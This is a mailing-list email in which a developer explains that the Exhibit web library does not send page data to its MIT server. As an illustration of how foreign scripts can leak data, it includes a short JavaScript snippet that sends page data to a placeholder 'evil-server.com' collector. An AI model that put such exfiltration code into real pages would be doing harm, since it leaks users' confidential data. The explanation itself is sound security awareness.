Hi Mark, That's a good question.
The quick answer is: absolutely No. Only code gets transfered from our server to the browser of whoever is viewing your web page. There, the code acts on your data entirely inside the browser to generate the rendering. To be clear, _any_ foreign code you include into your web page can act as a trojan horse, sending your data off regardless of whether your web page is protected by https:// or http://127.0.0.1/ or file:///. The trick is extremely simple: the code keeps injecting <script> elements or <img> elements into your web page's DOM dynamically to send off your data bit by bit, e.g., document.createElement("script"); script.src = "http://evil-server.com/data-collector/?data="; + somePieceOfYourData; document.body.appendChild(script); Exhibit does _not_ send your data off anywhere else, using this trick or any other trick. However, if your web page links to the script on our server, then our server automatically logs your domain name / IP address (as a referrer). This is a common behavior. The consequence of this behavior is interesting--perhaps Stefano will jump in and discuss it here. If you want absolutely no trace whatsoever of your use of Exhibit, then you need to download the source code and change it a little. Email me separately about this. Hope that's clear, David Mark Gadsby wrote: > > Hi, > > I have a quick question re: using Exhibit with confidential/propietary > data. Please forgive my ignorance if this is an obvious question. > > If I use Exhibit to display confidential data, is that data transfered > to MIT as part of the rendering of the page? I realise that to people > who understand web services this may be a stupid question. > > Many thanks, > > Mark > --- > > This e-mail may contain confidential and/or privileged information. If > you > are not the intended recipient (or have received this e-mail in error) > please notify the sender immediately and destroy this e-mail. Any > unauthorized copying, disclosure or distribution of the material in this > e-mail is strictly forbidden. > ------------------------------------------------------------------------ > > _______________________________________________ > General mailing list > [email protected] > http://simile.mit.edu/mailman/listinfo/general > _______________________________________________ General mailing list [email protected] http://simile.mit.edu/mailman/listinfo/general
